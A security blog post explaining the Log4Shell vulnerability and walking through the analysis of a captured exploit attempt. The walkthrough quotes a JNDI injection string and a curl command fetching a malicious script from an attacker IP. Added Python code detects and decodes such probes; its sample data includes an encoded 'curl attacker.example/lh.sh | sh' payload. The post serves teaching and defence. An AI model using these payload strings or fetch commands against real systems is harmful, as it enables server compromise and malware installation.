alvin gitonga

🔥 Log4SHELL: 😈 A Ticking Time Bomb 💣 💥

Cyber Morans 🤗,


Log4Shell (CVE-2021-44228) is a critical vulnerability in the widely used logging tool Log4j, which runs on millions of computers worldwide that provide online services. A wide range of people, including organisations, governments and individuals, are likely to be affected by it.

Although fixes have been issued, they still need to be applied. Log4j is an open-source logging library commonly used by apps and services across the internet. If left unfixed, attackers 😈 can break into systems, steal passwords and logins, extract data, and infect networks with malicious software.

Log4j is used worldwide across software applications and online services, and the vulnerability requires very little expertise to exploit. This makes Log4shell potentially the most severe computer vulnerability in years.


Who is affected by this? 🤕


Almost all applications have some form of logging (for development, operations and security purposes), and Log4j is a very common component used for this. For individuals, Log4j is almost certainly part of the devices and services you use online every day. The best thing you can do to protect yourself is make sure your devices and apps are as up to date as possible, and continue to update them regularly.


What is Log4j? 🧐


Modern software can be large, powerful, and complex. Rather than a single author writing all the code themselves, as was common decades ago, modern software creation involves large teams, and that software is increasingly made out of 'building blocks' pulled together by the team rather than written entirely from scratch. A team is unlikely to spend weeks writing new code when they can use existing code immediately. Log4j is one of the many building blocks used in the creation of modern software; we call this a software library. It is used by many organisations to do a common but vital job.

Log4j is used by developers to keep track of what happens in their software applications or online services. It's basically a huge journal of the activity of a system or application. This activity is called 'logging', and developers use it to spot problems affecting users.


How does Log4Shell work? 🐶

Log4Shell works by abusing a feature in Log4j that allows users to specify custom code for formatting a log message. This feature allows Log4j to, for example, log not only the username associated with each attempt to log in to the server but also the person's real name, if a separate server holds a directory linking user names to real names. To do so, the server running Log4j has to communicate with the server holding the real names.


Unfortunately, this kind of code can be used for more than just formatting log messages. Log4j allows third-party servers to submit commands that can perform all kinds of actions on the targeted computer. This opens the door for nefarious activities such as stealing sensitive information, taking control of the targeted system and slipping malicious content to other users communicating with the affected server.


It is relatively simple to exploit Log4Shell. I was able to reproduce the problem with Ghidra, a reverse-engineering framework for security researchers, pretty easily. There is a very low bar for using this exploit, which means a wider range of people with malicious intent can use it.


Log4j is everywhere ☠️

One of the major concerns about Log4Shell is Log4j's position in the software ecosystem. Logging is a fundamental feature of most software, which makes Log4j very widespread. In addition to popular games like Minecraft, it's used in cloud services like Apple iCloud, Safaricom, Telcom, Jiji, JUMIA, apps and Amazon Web Services, as well as a wide range of programs from software development tools to security tools.

This means hackers have a large menu of targets to choose from: home users, service providers, source code developers and even security researchers. So while big companies like Amazon can quickly patch their web services to prevent hackers from exploiting them, there are many more organizations that will take longer to patch their systems, and some that might not even know they need to.


The damage that can be done

Hackers 😈 are scanning the internet to find vulnerable servers and setting up machines that can deliver malicious payloads. To carry out an attack, they query services (for example, web servers) and try to trigger a log message (for example, a 404 error). The query includes maliciously crafted text, which Log4j processes as instructions.

These instructions can create a reverse shell, which allows the attacking server to remotely control the targeted server, or they can make the target server part of a botnet. Botnets use multiple hijacked computers to carry out coordinated actions on behalf of the hackers.


A large number of hackers 🥸 are already trying to abuse Log4Shell. These range from ransomware gangs locking down Minecraft servers to hacker groups trying to mine Bitcoin, and hackers associated with China and North Korea trying to gain access to sensitive information from their geopolitical rivals. The Belgian Ministry of Defence reported that its computers were being attacked using Log4Shell.


Investigating a Log4j Malware attack

I stumbled upon a malware attack attempt 😈 exploiting the Log4j vulnerability and analysed it with a few tools. ☠️ The victim? A supermarket or some sort of store in KZN, South Africa. I caught it using netlas.io and any.run and thought it a good example.

So lemme show you:

First we view the logs 👇


The part after Bearer 👆 is the attack itself. As you can see it has

${jndi:ldap://attackerIP/payloadpath}

Typical Log4j exploitation technique. But the actual payload command is obfuscated. This we can simply decode with base64 to reveal it 👇

and voila! That is the command 👆

So to recap: so far it calls out to an attackerIP, creates a basic shell script (.sh), then runs a command that is base64 encoded.
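As an added example (not code from the original post), here is a small Python detector for the lookup string shown above and for the de-obfuscation step done by hand in this section. It collapses the nested-lookup tricks that Log4j itself resolves (${lower:j}, ${upper:n}, ${::-d} and friends) before matching ${jndi:...}, and base64-decodes any path segment of the callback URL to recover the embedded command. The sample log lines and the attacker.example host are constructed placeholders.

```python
import base64
import re

INNER = re.compile(r"\$\{([^${}]*)\}")   # innermost ${...}: no nested "${" inside
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/}\s]+)([^}\s]*)", re.I)

def _resolve(m):  # one innermost lookup, evaluated as Log4j would (jndi itself is kept)
    key, _, rest = m.group(1).partition(":")
    key = key.strip().lower()
    if key == "lower":
        return rest.lower()                  # ${lower:J} -> j
    if key == "upper":
        return rest.upper()                  # ${upper:n} -> N
    if key != "jndi" and ":-" in m.group(1):
        return m.group(1).split(":-", 1)[1]  # ${anything:-default} -> default, e.g. ${::-j} -> j
    return m.group(0)                        # jndi, or an unresolvable key: left verbatim

def normalize(text):
    """Collapse nested lookups from the inside out until nothing changes."""
    while True:
        resolved = INNER.sub(_resolve, text)
        if resolved == text:
            return resolved
        text = resolved

def _b64_text(seg):
    try:
        return base64.b64decode(seg, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):   # not base64, or not text: ignore
        return ""

def decode_segments(path):  # path segments that are base64 of printable text (the hidden command)
    return [t for t in map(_b64_text, path.split("/")) if t and t.isprintable()]

def analyze(line):
    """Return a finding for a Log4Shell probe in one log line, or None if clean."""
    clean = normalize(line)
    m = JNDI.search(clean)
    if not m:
        return None
    scheme, host, path = m.groups()
    return {"obfuscated": clean != line, "scheme": scheme.lower(),
            "host": host, "commands": decode_segments(path)}

# Constructed sample lines (not from the post); attacker.example is a placeholder host.
SAMPLE_CMD = "curl -s attacker.example/lh.sh | sh"
SAMPLE_LOGS = [
    "Bearer ${jndi:ldap://attacker.example:1389/Basic/Command/Base64/%s}" % base64.b64encode(SAMPLE_CMD.encode()).decode(),
    "User-Agent: ${${lower:j}${upper:n}di:${::-l}${::-d}${::-a}${::-p}://attacker.example/a}",
]
```

Run analyze() over each request log line; a non-None result with "obfuscated" set is the stronger signal, since benign traffic never needs nested lookups.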

Now I will curl the entire path. Yes! curl can download from LDAP. Watch... 👇

and straight up we have more info 👆. javaCodeBase must be the base URL; it seems to call a class. javaFactory is that class (or payload). Let's mess with it, no? 👇

Error 404 👆. Now I did read that sometimes this request can time out if not executed fast enough... try and try and NOTHING 💩💩💩. It just kept deleting the object before I could reach it.


So I go to GitHub and search for a script that can automate this request. Yes! Found 3. Tested them and this one worked best. It is from the MalwareTechBlog GitHub. It parses out the URL and the javaFactory and basically just gets the class. 👇

Now we have the class ☠️, the actual payload, the exploit, the 🤬 (Samuel L. Jackson's favourite word!) 👇

ExploitIssnkiBjvy.class

Now we open it with JD-GUI, a Java decompiler, so we can see the code 👇

☠️ Sorry for light mode. However, Java code is mostly not obfuscated and thus readable to anyone with a basic programming background. So, what are we looking at 👆?


First you notice the same string we decoded with base64 earlier appears here. ☠️ Now if you were to copy that into your shell (I wouldn't dare you to 💩) it will infect your machine. ☠️ Especially if it's your main machine. I used a VM and so am licensed to be reckless...

So let's get reckless:

I open a new terminal and type

curl 194.40.243.149/lh.sh

Note I removed the -s (for silent) so I could see what it does; more like -v (verbose) 👇

The 👆 ld.so.preload is commonly used to load malicious modules such as ☠️ bootkits and ☠️ rootkits, so I bet this is some sort of rootkit. It disables the firewalls, iptables etc.

Let's scroll to where the payload is actually downloaded 👇

Right there 👆, got it! BIN_DOWNLOAD_URL="http:..... is the URL it's getting it from.

Then it downloads a file: libsystem.so. I bet this is the rootkit 💀

So let's fetch it 👇

Many, many minutes later 👇

HUUUUUUGE binary... 👆

Let's cat the strings... I bet it will be C... or assembly or bash... 👇

NOOOOOOPE! 👆 It's Golang... The malware is in Golang, people! This is getting very common: malware in Golang and Rust, probably because you can make an impossibly huge binary file.


This was a PoC (proof of concept) of malware exploiting Log4Shell. I won't reverse the binary today.


Why haven't we seen a devastating worm yet? 🤖

On the news and on social media you've probably seen a lot of claims that a Log4j worm is coming, and that when it comes it's going to cause all kinds of problems; it's going to be the worst-case scenario and we need to do everything to avoid it. It's been a couple of months now, and we're probably wondering: well, where is this Log4j worm?


1. 👉 A worm is very hard to make. When you look at history (Stuxnet, WannaCry, NotPetya), these were very specific, state-sponsored attacks. They require a lot of skill and money to build, but mostly they take time. Stuxnet was built over 5 years just to compromise Iran. These are heavy-duty cyber operations requiring a bottomless sponsor (governments). But also these are made for very specific purposes and are used for cyber warfare. Stuxnet was the USA messing with Iran, NotPetya was Adolf Putin (Russia) waging war over Ukraine, and WannaCry was Kim Jong Un looking for some extra pocket money.


2. 👉 A reason to build a worm is that you have a lot of devices connected to the local network but not to the WAN or the internet. This was the case with WannaCry and NotPetya: the vulnerability affected SMB, and the SMB server might be connected to the internet, but all of the other computers on the network would have been behind a firewall (or not). So what would happen is the virus would hit the SMB server from the internet and then spread within the network from there; that was the only way it could reach those systems that were not directly connected to the internet. But Log4j is a lot different to EternalBlue.


3. 👉 Those were protocol vulnerabilities (EternalBlue and BlueKeep); Log4j is a library vulnerability. While it's rampant, it's used very differently depending on the developer. A dev can be logging timestamps, requests, error messages, IRC messages, etc. Not particularly juicy info. A Log4j worm would need to carry all of these exploits, one for each different use of the library in a piece of software. This is noisy, and mostly pointless.



Mitigation 👩‍⚕️

As a user, you are probably wondering what you can do about all this. Unfortunately, it is hard to know whether a software product you are using includes Log4j, and whether it is using a vulnerable version. However, you can help by heeding the common refrain from computer security experts:


👉 Make sure all of your software is up to date.

Due to the severity of the Log4j vulnerability, a system with any installed instance of Log4j, regardless of whether it is part of a running application or service, should be treated as vulnerable.

👉 Out-of-date Log4j versions need to be updated immediately. To identify vulnerable systems, internal and external vulnerability scanning tools that contain signatures or plugins for identifying Log4j instances can be used.

👉 Open-source vulnerability toolsets can also be leveraged, such as https://github.com/fullhunt/log4j-scan and https://github.com/jfrog/log4j-tools.
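An added example (not the post's own code, and not one of the tools linked above) of the "identify Log4j instances" step in Python: it opens a jar, reads the log4j-core version from its Maven pom.properties, checks whether the JndiLookup class is still present, and applies the CVE-2021-44228 affected range. The build_sample_jar helper fabricates an in-memory stand-in so the check runs offline; real jars are passed by path.

```python
import io
import re
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"

def parse_version(v):
    """'2.14.1' -> (2, 14, 1); a pre-release such as '2.0-beta9' keeps only the numbers."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", v)
    return tuple(int(x or 0) for x in m.groups()) if m else None

def version_affected(v):
    """CVE-2021-44228 affects log4j-core 2.0-beta9..2.14.1; fixed in 2.15.0, 2.12.2 (Java 7), 2.3.1 (Java 6)."""
    t = parse_version(v)
    if t is None or t[0] != 2:
        return False                     # log4j 1.x is out of scope for this CVE
    fixed = t >= (2, 15, 0) or (t[:2] == (2, 12) and t >= (2, 12, 2)) or (t[:2] == (2, 3) and t >= (2, 3, 1))
    return not fixed

def inspect_jar(src):
    """Report whether a jar (path or bytes) ships a log4j-core that still has the JNDI lookup."""
    if isinstance(src, bytes):
        src = io.BytesIO(src)
    version = None
    with zipfile.ZipFile(src) as z:
        names = set(z.namelist())
        if POM_PROPS in names:
            for line in z.read(POM_PROPS).decode("ascii", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
    has_jndi = JNDI_CLASS in names
    # Deleting JndiLookup.class was Apache's documented mitigation for jars that cannot be upgraded,
    # so its absence clears the jar; an unknown version with the class present is treated as vulnerable.
    return {"version": version, "jndi_lookup_present": has_jndi,
            "vulnerable": has_jndi and (version is None or version_affected(version))}

def build_sample_jar(version, include_jndi=True):
    """Constructed in-memory stand-in for a log4j-core jar (not a real Apache artifact)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr(POM_PROPS, "groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion=%s\n" % version)
        if include_jndi:
            z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")   # class-file magic only, not real bytecode
    return buf.getvalue()
```

Fat or shaded jars that bundle log4j-core often drop pom.properties, which is why a missing version with the class present is still reported as vulnerable rather than skipped.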


CONCLUSION

Subscribe to receive notifications of similar posts 😋 where we will be reverse engineering malware and the technical aspect of vulnerabilities, as well as how an attacker may use this vulnerability as an attack vector, and other infosec stuff... 😋


Morans,


Thank you for your time. Like and leave a comment/review and, as always, stay awesome! 😋👊 💪
